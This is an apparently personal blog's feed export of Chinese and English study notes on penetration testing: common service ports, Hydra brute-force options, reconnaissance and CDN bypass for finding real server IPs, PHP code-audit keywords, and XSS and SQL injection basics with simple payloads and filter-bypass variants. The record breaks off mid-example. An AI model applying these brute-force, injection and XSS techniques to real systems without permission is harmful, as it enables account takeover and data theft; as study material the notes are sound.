<entry>
<title>Brute Forcing</title>
<link href="https://myprefer.github.io/post/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4.html"/>
<id>https://myprefer.github.io/post/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4.html</id>
<published>2024-02-24T09:07:28.000Z</published>
<updated>2024-03-03T08:47:42.791Z</updated>
<content type="html"><![CDATA[<h4 id="常见的端口服务"><a href="#常见的端口服务" class="headerlink" title="常见的端口服务"></a>常见的端口服务</h4><div class="language-txt"><button title="Copy code" class="copy"></button><span class="lang">txt</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #babed8">http 80</span></span><span class="line"><span style="color: #babed8">https 443</span></span><span class="line"><span style="color: #babed8">ftp 21</span></span><span class="line"><span style="color: #babed8">ssh 22</span></span><span class="line"><span style="color: #babed8">mysql 3306</span></span><span class="line"><span style="color: #babed8">mssql 1433</span></span><span class="line"><span style="color: #babed8">rsync 873</span></span><span class="line"><span style="color: #babed8">oracle 1521</span></span><span class="line"><span style="color: #babed8">mongo 28017</span></span><span class="line"><span style="color: #babed8">redis 6379</span></span><span class="line"><span style="color: #babed8">tomcat 8080</span></span><span class="line"><span style="color: #babed8">smtp 25</span></span><span class="line"><span style="color: #babed8">POP3 110</span></span><span class="line"><span style="color: #babed8">dns 53</span></span><span class="line"><span style="color: #babed8">telent 23</span></span><span class="line"><span style="color: #babed8">vnc 5900</span></span><span class="line"><span style="color: #babed8">pcanywhere 5632</span></span><span class="line"><span style="color: #babed8">Apache/Tomcat/Nginx/Axis2/resin/jboss 80|8080</span></span><span class="line"><span style="color: #babed8">WebLogic 7001</span></span><span class="line"><span style="color: #babed8">Jenkins 8080 8089</span></span><span class="line"><span style="color: #babed8">SNMP 161</span></span><span class="line"><span style="color: #babed8">Zabbix 8069</span></span><span class="line"><span style="color: #babed8">elasticsearch 9200 
9300</span></span><span class="line"><span style="color: #babed8">rdp 3389</span></span></code></pre></div><h4 id="穷举爆破工具九头蛇hydra"><a href="#穷举爆破工具九头蛇hydra" class="headerlink" title="穷举爆破工具九头蛇hydra"></a>穷举爆破工具九头蛇hydra</h4><div class="language-sh"><button title="Copy code" class="copy"></button><span class="lang">sh</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #FFCB6B">hydra</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-h</span></span><span class="line"><span style="color: #FFCB6B">hydra</span><span style="color: #BABED8"> [[[-l </span><span style="color: #C3E88D">LOGIN</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">-L</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE]</span><span style="color: #BABED8"> [-p </span><span style="color: #C3E88D">PASS</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">-PFILE]]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">|</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-C FILE</span><span style="color: #89DDFF">]</span><span style="color: #BABED8">] </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-e ns</span><span style="color: #89DDFF">]</span></span><span class="line"></span><span class="line"><span style="color: #89DDFF">[</span><span style="color: #BABED8">-o FILE</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-t TASKS</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-M FILE </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-T TASKS</span><span style="color: #89DDFF">]][</span><span style="color: #BABED8">-w 
TIME</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-f</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-s PORT</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-S</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">-vV</span><span style="color: #89DDFF">]</span><span style="color: #BABED8"> server service </span><span style="color: #89DDFF">[</span><span style="color: #BABED8">OPT</span><span style="color: #89DDFF">]</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-R</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">继续从上一次进度接着破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-S</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">采用SSL链接。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-s</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">PORT</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">可通过这个参数指定非默认端口。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-l</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">LOGIN</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定破解的用户,对特定用户破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-L</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定用户名字典。</span></span><span class="line"></span><span class="line"><span style="color: 
#FFCB6B">-p</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">PASS</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">小写,指定密码破解,少用,一般是采用密码字典。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-P</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">大写,指定密码字典。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-e</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ns</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">可选选项,n:空密码试探,s:使用指定用户和密码试探。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-C</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-M</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定目标列表文件一行一条。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-o</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">FILE</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定结果输出文件。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-f</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-t</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">TASKS</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">同时运行的线程数,默认为16。</span></span><span class="line"></span><span class="line"><span style="color: 
#FFCB6B">-w</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">TIME</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">设置最大超时的时间,单位秒,默认是30s。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">-v</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">/</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">-V</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">显示详细过程。</span></span><span class="line"></span><span class="line"><span style="color: #FFCB6B">service</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">指定服务名,支持的服务和协议:telnetftp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pop3[-ntlm]</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">imap[-ntlm]</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">smb</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">smbnt</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">http-</span><span style="color: #BABED8">{head</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">get}</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">http-{get</span><span style="color: #89DDFF">|</span><span style="color: #FFCB6B">post}-formhttp-proxy</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cisco</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cisco-enable</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">vnc</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">ldap2</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ldap3</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">mssql</span><span style="color: #BABED8"> </span><span style="color: 
#C3E88D">mysql</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">oracle-listenerpostgres</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">nntp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">socks5</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">rexec</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">rlogin</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pcnfs</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">snmp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">rsh</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">cvs</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">svn</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">icq</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sapr3</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sshsmtp-auth[-ntlm]</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">pcanywhere</span><span style="color: #BABED8"> </span></span><span class="line"><span style="color: #FFCB6B">teamspeak</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">sip</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">vmauthd</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">firebird</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">ncp</span><span style="color: #BABED8"> </span><span style="color: #C3E88D">afp等等。</span></span></code></pre></div>]]></content>
<summary type="html"><h4 id="常见的端口服务"><a href="#常见的端口服务" class="headerlink" title="常见的端口服务"></a>常见的端口服务</h4><div class="language-txt"><button title="Copy code" c</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="穷举爆破" scheme="https://myprefer.github.io/tags/%E7%A9%B7%E4%B8%BE%E7%88%86%E7%A0%B4/"/>
</entry>
<entry>
<title>Information Gathering</title>
<link href="https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html"/>
<id>https://myprefer.github.io/post/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86.html</id>
<published>2024-02-22T07:35:50.000Z</published>
<updated>2024-03-03T08:47:57.048Z</updated>
<content type="html"><![CDATA[<ul><li>信息收集是渗透测试的前提</li></ul><h4 id="whois域名注册信息查询"><a href="#whois域名注册信息查询" class="headerlink" title="whois域名注册信息查询"></a>whois域名注册信息查询</h4><ul><li>命令: whois <域名></li><li><a href="https://whois.aizhan.com/">站长工具_whois查询工具_爱站网</a></li><li><a href="https://www.webscan.cc/">同IP网站查询,C段查询,IP反查域名,在线C段,旁站工具 - WebScan</a></li><li><a href="https://www.tianyancha.com/">天眼查</a></li></ul><h4 id="文件和目录扫描工具"><a href="#文件和目录扫描工具" class="headerlink" title="文件和目录扫描工具"></a>文件和目录扫描工具</h4><ul><li>DirBuster</li><li>Pker</li><li>御剑后台扫描工具</li></ul><h4 id="子域名收集"><a href="#子域名收集" class="headerlink" title="子域名收集"></a>子域名收集</h4><h5 id="域名构成"><a href="#域名构成" class="headerlink" title="域名构成"></a>域名构成</h5><p>域名各部分由<code>.</code>分隔, 最右边的为一级域名(顶级域名, TLD, 如com, org等), 其左为二级域名(SLD), 以此类推</p><p>每级域名控制下一级域名的分配</p><p>子域名: 例如<code>space.bilibili.com</code>和<code>www.bilibili.com</code>是<code>bilibili.com</code>的子域名</p><h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><ol><li><p>端口扫描相关概念:端口->服务</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" 
stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z"></path></svg></span><p>一般在知道服务器开放了哪些端口后,就知道服务器开启了哪些服务。</p></blockquote></li><li><p>端口扫描的实</p><p>端口扫描包括向每个端口发送消息,一次只发送一个消息。接收到的回应类型表示是否在使用该端口并且可由此探寻弱点。</p></li><li><p>工具</p><ul><li><p>Nmap</p></li><li><p>御剑</p></li></ul><p><img src="https://i0.imgs.ovh/2024/02/23/SSlST.png" alt="SSlST.png"></p></li><li><p>常见开放端口及攻击方向</p><p><img src="https://i0.imgs.ovh/2024/02/23/SoaSs.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SovdX.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSC2U.png" alt="SSC2U.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSPh0.png" alt="SSPh0.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSVUC.png" alt="SSVUC.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSXCt.png" alt="SSXCt.png"></p><p><img src="https://i0.imgs.ovh/2024/02/23/SSr6m.png" alt="SSr6m.png"></p></li></ol><h4 id="指纹识别"><a href="#指纹识别" class="headerlink" title="指纹识别"></a>指纹识别</h4><ul><li>识别出相应的Web容器或CMS才能查找与其相关的漏洞, 然后才能进行相应的渗透操作</li></ul><p><img src="https://i0.imgs.ovh/2024/02/23/SSY7p.png" alt="SSY7p.png"></p><h4 id="查找真实IP"><a href="#查找真实IP" class="headerlink" title="查找真实IP"></a>查找真实IP</h4><ul><li><p>判断是否使用CDN</p><ul><li><p>ping, 观察域名解析情况</p></li><li><p>在不同地区ping目标看解析ip是否一致</p><p><a href="https://17ce.com/">网站测速|网站速度测试|网速测试|电信|联通|网通|全国|监控|CDN|PING|DNS 一起测试|17CE.COM</a></p></li></ul></li><li><p>目标服务器不存在CDN</p><ul><li><a 
href="https://ip138.com/">iP地址查询–手机号码查询归属地 | 邮政编码查询 | iP地址归属地查询 | 身份证号码验证在线查询网 (ip138.com)</a></li></ul></li><li><p>存在CDN</p><ul><li>内部邮箱源</li><li>扫描网站测试文件, 如phpinfo, test等</li><li>分站域名, 二级域名可能没有挂CDN</li><li>国外代理访问</li><li>查询域名解析记录, 目标可能以前没有使用CDN: <a href="https://www.netcraft.com/">Netcraft | Leader in Phishing Detection, Cybercrime Disruption and Website Takedown</a></li><li>很多网站使用CloudFlare提供的CDN, 可以绕过CloudFlare CDN查找真实ip</li></ul></li><li><p>验证获取的IP</p><p>直接用获取到的IP访问, 看返回的页面是否和访问域名返回的一样</p></li></ul>]]></content>
<summary type="html"><ul>
<li>信息收集是渗透测试的前提</li>
</ul>
<h4 id="whois域名注册信息查询"><a href="#whois域名注册信息查询" class="headerlink" title="whois域名注册信息查询"></a>whois域名注册信息查询<</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="信息收集" scheme="https://myprefer.github.io/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/"/>
</entry>
<entry>
<title>Code Auditing</title>
<link href="https://myprefer.github.io/post/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.html"/>
<id>https://myprefer.github.io/post/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.html</id>
<published>2024-02-14T08:54:53.000Z</published>
<updated>2024-03-03T08:48:51.163Z</updated>
<content type="html"><![CDATA[<h3 id="概念"><a href="#概念" class="headerlink" title="概念"></a>概念</h3><p> 由具备丰富的编码经验并对安全编码及应用安全工具有很深刻理解的安全服务人员根据一定的代码规范和标准,针对应用程序源代码,从结构,脆弱性以及缺陷等方面进行审查,最终输出代码审计报告,完善应用程序,提升自身安全水平。</p><blockquote><span class="custom-blockquote-svg"><svg width="24" height="24" viewBox="0 0 24 24" fill="" xmlns="http://www.w3.org/2000/svg" data-reactroot=""><path fill="" d="M22 12C22 6.5 17.5 2 12 2C6.5 2 2 6.5 2 12C2 17.5 6.5 22 12 22C13.8 22 15.5 21.5 17 20.6L22 22L20.7 17C21.5 15.5 22 13.8 22 12Z" undefined="1"></path><path fill="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z" undefined="1"></path><path fill="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 11.5Z" undefined="1"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M17 8.5C15.23 8.97 14.07 10.84 14.01 13.27C14 13.33 14 13.4 14 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M9 8.5C7.23 8.97 6.07 10.84 6.01 13.27C6 13.33 6 13.4 6 13.47V13.5"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M15.97 11.5H16.04C17.12 11.5 18 12.38 18 13.47V13.53C18 14.62 17.12 15.5 16.03 15.5H15.96C14.88 15.5 14 14.62 14 13.53V13.46C14 12.38 14.88 11.5 15.97 11.5Z"></path><path stroke-linejoin="round" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2" stroke="" d="M7.97 11.5H8.04C9.12 11.5 10 12.38 10 13.47V13.53C10 14.62 9.12 15.5 8.03 15.5H7.97C6.88 15.5 6 14.62 6 13.53V13.46C6 12.38 6.88 11.5 7.97 
11.5Z"></path></svg></span><p><strong>步骤</strong>:</p><ol><li>配置审计分析环境</li><li>熟悉业务流程</li><li>分析程序架构</li><li><strong>工具自动化分析</strong></li><li><strong>人工审计结果</strong></li><li>整理审计报告</li></ol></blockquote><h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><ul><li>观察项目整体框架<ul><li>项目文件目录结构</li><li>明确每个文件的作用功能</li></ul></li><li>根据敏感<strong>关键字</strong>回溯参数传递过程</li><li>预定义的变量()<code>$_GET $_POST $_COOKIE $_SERVER $_ENV $_SESSION</code>等)</li><li>未初始化的变量(<code>regist_globle=on</code>)</li><li>变量覆盖</li><li>变量的传递存储(中转的变量)</li><li>文件包含(require,include,require_once,include_once`)</li><li>代码执行(<code>eval() assert()等</code>)</li><li>命令执行(<code>exec() shell_exec() system()等</code>)</li><li>SQL注入和XSS漏洞相关的关键字<ul><li>SQL注入(<code>select from、mysql_connect、mysql_query、mysql_fetch_row、update、insert、delete SET NAMES、character_set_client=gbk、mysql_set_charset('gbk’) urldecode、rawurldecode </code>)</li><li>XSS(<code>print、print_r、echo、printf、sprintf、die、var_dump、var_export等</code>)</li></ul></li><li>查找可控变量,追踪变量<strong>传递</strong>过程<ul><li>常见的可操控变量:<code>name、id、password、pwd、select、search</code></li></ul></li><li>寻找敏感<strong>功能点</strong>,通读功能点代码<ul><li>文件上传</li><li>文件管理</li><li>登录认证</li><li>密码管理</li></ul></li><li>有<strong>逻辑</strong>性、有<strong>目的</strong>性地通读全文代码<ul><li>目的性: 特别关注函数集文件、配置文件、安全过滤文件、index文件等重要文件</li></ul></li></ul><h3 id="目的"><a href="#目的" class="headerlink" title="目的"></a>目的</h3><ol><li>实现快速的漏洞扫描和修补</li><li>打造更加安全可靠的网络运行环境</li></ol><h3 id="代码审计工具"><a href="#代码审计工具" class="headerlink" title="代码审计工具"></a>代码审计工具</h3><h4 id="RIPS"><a href="#RIPS" class="headerlink" title="RIPS"></a>RIPS</h4><p><img src="https://i0.imgs.ovh/2024/02/17/ooi7T.png"></p><h4 id="SEAY"><a href="#SEAY" class="headerlink" title="SEAY"></a>SEAY</h4><p><img src="https://i0.imgs.ovh/2024/02/17/oSzBO.png"></p>]]></content>
<summary type="html"><h3 id="概念"><a href="#概念" class="headerlink" title="Concept"></a>Concept</h3><p>Security service staff with extensive coding experience and a deep understanding of secure coding and application security tools review an application's source code against a given set of coding conventions and standards, examining it for structural problems, weaknesses and</summary>
<category term="网络安全" scheme="https://myprefer.github.io/tags/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/"/>
<category term="学习日志" scheme="https://myprefer.github.io/tags/%E5%AD%A6%E4%B9%A0%E6%97%A5%E5%BF%97/"/>
<category term="WEB攻防" scheme="https://myprefer.github.io/tags/WEB%E6%94%BB%E9%98%B2/"/>
<category term="代码审计" scheme="https://myprefer.github.io/tags/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/"/>
</entry>
<entry>
<title>Vulnerability Classification</title>
<link href="https://myprefer.github.io/post/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB.html"/>
<id>https://myprefer.github.io/post/%E6%BC%8F%E6%B4%9E%E5%88%86%E7%B1%BB.html</id>
<published>2024-02-14T08:23:14.000Z</published>
<updated>2024-03-03T08:48:32.114Z</updated>
<content type="html"><![CDATA[<h2 id="暴力破解漏洞"><a href="#暴力破解漏洞" class="headerlink" title="Brute-force vulnerabilities"></a>Brute-force vulnerabilities</h2><ul><li>Systematically trying <strong>every</strong> possible combination (for example of the account name and password used to log in) to recover a user's account name, password or other sensitive information; usually an <strong>automated</strong> script assembles candidate username/password pairs until the correct one is found.<br><strong>In short:</strong> continuous attempts + dictionary + automation</li></ul><h5 id="流程"><a href="#流程" class="headerlink" title="Workflow"></a>Workflow</h5><ul><li>Confirm that the login interface is vulnerable<ul><li>For example: attempt a login, capture the request, and examine the validation elements and the response</li></ul></li><li>Optimise the dictionary<ul><li>Optimise it based on the hints shown during registration</li><li>Administrator accounts</li></ul></li><li>Automate with tooling</li></ul><h2 id="XSS跨站脚本"><a href="#XSS跨站脚本" class="headerlink" title="XSS (cross-site scripting)"></a>XSS (cross-site scripting)</h2><h3 id="介绍"><a href="#介绍" class="headerlink" title="Introduction"></a>Introduction</h3><ul><li><p>Cross-site scripting, XSS for short</p></li><li><p>The input is a special string that the browser parses, such as</p><div class="language-html"><span class="lang">html</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span class="line"><span style="color: #89DDFF">&lt;/</span><span style="color: #F07178">p</span><span style="color: #89DDFF">&gt;&lt;</span><span style="color: #F07178">script</span><span style="color: #89DDFF">&gt;</span><span style="color: #82AAFF">alert</span><span style="color: #BABED8">(</span><span style="color: #89DDFF">'</span><span style="color: #C3E88D">this is an alert</span><span style="color: #89DDFF">'</span><span style="color: #BABED8">)</span><span style="color: #89DDFF">;&lt;/</span><span style="color: #F07178">script</span><span style="color: #89DDFF">&gt;&lt;</span><span style="color: #F07178">p</span><span style="color: #89DDFF">&gt;</span></span></code></pre></div><p>where the code inside the script tag is executed</p></li><li><p>Categories: reflected XSS, stored XSS, DOM-based XSS</p><ul><li><p>Reflected XSS</p><ul><li><p>Execution flow:</p><blockquote><p>1. Content containing malicious code is entered at an input point; the input point submits via GET, so the input is visible in the URL<br>2. The back end receives the submitted data without filtering the input<br>3. It is then rendered to the front end and the browser executes the malicious code</p></blockquote></li></ul></li><li><p>Stored XSS</p><ul><li><p>Stored XSS differs from reflected XSS in that the maliciously crafted code is stored in the database</p></li><li><p>Execution flow:</p><blockquote><p>1. Content containing malicious code is entered in, for example, a message board<br>2. The input is submitted to the back-end code, which filters it loosely and then performs an insert into the database<br>3. At this point the malicious code has been saved in the database<br>4. Whenever anyone views that message, the malicious code is executed, until the entry is deleted from the database</p></blockquote></li></ul></li><li><p>DOM-based XSS</p><ul><li>A vulnerability based on the Document Object Model; DOM nodes can be constructed dynamically</li><li>The malicious code is built and rendered entirely on the front end without passing through back-end code</li></ul></li></ul></li></ul><h4 id="测试流程"><a href="#测试流程" class="headerlink" title="Testing workflow"></a>Testing workflow</h4><ol><li>Find input points on the target site, such as query interfaces or message boards</li><li>Submit a set of "special characters + unique marker string", then inspect the returned source to see whether the input has been processed</li><li>Search for the unique marker and, from the syntax around it, determine whether the conditions for executing JS can be constructed (closing the surrounding context)</li><li>Submit the constructed script (and its various bypass variants) and check whether it executes; if it does, an XSS vulnerability exists</li></ol><h4 id="tips"><a href="#tips" class="headerlink" title="Tips"></a>Tips</h4><ol><li>Query interfaces are prone to reflected XSS; message boards are prone to stored XSS</li><li>Because the back end may filter input, the constructed script may be stripped and never take effect, or the environment (the browser) may block execution</li><li>Vary the script to try to bypass the back-end filtering</li></ol><h4 id="XSS绕过"><a 
href="#XSS绕过" class="headerlink" title="XSS filter bypasses"></a>XSS filter bypasses</h4><ul><li>Transformations<ul><li>Case variation: <code>&lt;ScRipT&gt;</code></li><li>Splicing: <code>&lt;scr&lt;script&gt;ipt&gt;</code></li><li>Comments: <code>&lt;sc&lt;!--a--&gt;ript&gt;</code></li></ul></li><li>Encoding<ul><li>URL encoding</li><li>HTML encoding</li></ul></li></ul><h2 id="SQL注入"><a href="#SQL注入" class="headerlink" title="SQL injection"></a>SQL injection</h2><h4 id="概述"><a href="#概述" class="headerlink" title="Overview"></a>Overview</h4><ul><li><p>An attacker submits carefully crafted statements through a legitimate input point, tricking the back-end database into executing them and leaking database contents</p></li><li><p>For example:<br>Normal input: <code>1</code>, which executes <code>select password from users where id=1</code><br>Malicious input: <code>1 or 1=1</code>, which executes <code>select password from users where id=1 or 1=1;</code><br>The latter returns every password in the table</p></li></ul><h4 id="攻击流程"><a href="#攻击流程" class="headerlink" title="Attack workflow"></a>Attack workflow</h4><ol><li><p>Injection point discovery (automated or manual)</p><ul><li>Determine the injection point type</li><li>Determine the number of columns in the query</li><li>Determine which columns are displayed</li></ul></li><li><p>Information gathering</p><ul><li><p>Obtain all database names</p><blockquote><p>Show everything at once: group_concat(column_name)</p><p>Show one at a time: limit</p></blockquote></li><li><p>Obtain all table names in a database</p></li><li><p>Obtain all column names in a table</p></li><li><p>Obtain the column data</p></li></ul></li><li><p>Obtain privileges</p></li></ol><h4 id="注入点类型"><a href="#注入点类型" class="headerlink" title="Injection point types"></a>Injection point types</h4><ul><li>Numeric</li><li>String: <code>'xxx'</code></li><li>Search: <code>%xxx%</code></li></ul><p><em>Construct the closing syntax according to the type</em></p><h4 id="基于union联合查询的信息获取"><a href="#基于union联合查询的信息获取" class="headerlink" title="Information retrieval via UNION queries"></a>Information retrieval via UNION queries</h4><ul><li>The number of columns in both queries must match</li></ul><h4 id="判断查询列数"><a href="#判断查询列数" class="headerlink" title="Determining the number of query columns"></a>Determining the number of query columns</h4><ul><li>order by: sorts by the specified column name</li></ul><h4 id="基于报错信息获取"><a href="#基于报错信息获取" class="headerlink" title="Error-based information retrieval"></a>Error-based information retrieval</h4><ul><li>Use certain functions to trigger errors and extract specific information from the error messages</li><li>Precondition: the back end does not suppress error messages, so syntax errors are shown on the front end</li></ul><h5 id="报错函数"><a href="#报错函数" class="headerlink" title="Error-producing functions"></a>Error-producing functions</h5><ul><li><p><code>updatexml()</code></p><div class="language-sql"><span class="lang">sql</span><pre class="shiki material-theme-palenight" style="background-color: #1a1a1a" tabindex="0"><code><span 